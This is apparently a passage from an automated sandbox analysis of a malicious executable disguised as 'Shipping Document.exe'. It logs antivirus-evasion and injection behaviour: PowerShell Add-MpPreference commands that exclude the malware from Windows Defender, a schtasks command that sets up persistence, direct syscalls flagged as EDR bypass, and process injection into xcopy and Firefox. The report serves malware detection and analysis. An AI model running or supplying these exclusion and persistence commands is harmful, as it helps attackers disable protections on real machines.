                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KOENBvWt.exe"
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KOENBvWt.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtProtectVirtualMemory: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeNtProtectVirtualMemory: Direct from: 0x77762F9C
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Shipping Document.exeMemory written: C:\Users\user\Desktop\Shipping Document.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeMemory written: C:\Users\user\AppData\Roaming\KOENBvWt.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: NULL target: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe protection: read write
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\xcopy.exeThread register set: target process: 7704
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KOENBvWt.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Users\user\Desktop\Shipping Document.exe "C:\Users\user\Desktop\Shipping Document.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeProcess created: C:\Users\user\AppData\Roaming\KOENBvWt.exe "C:\Users\user\AppData\Roaming\KOENBvWt.exe"Jump to behavior
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3696428465.0000000001570000.00000002.00000001.00040000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358764726.0000000001570000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3696428465.0000000001570000.00000002.00000001.00040000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358764726.0000000001570000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3696428465.0000000001570000.00000002.00000001.00040000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358764726.0000000001570000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3696428465.0000000001570000.00000002.00000001.00040000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358764726.0000000001570000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Shipping Document.exeQueries volume information: C:\Users\user\Desktop\Shipping Document.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeQueries volume information: C:\Users\user\AppData\Roaming\KOENBvWt.exe VolumeInformationJump to behavior
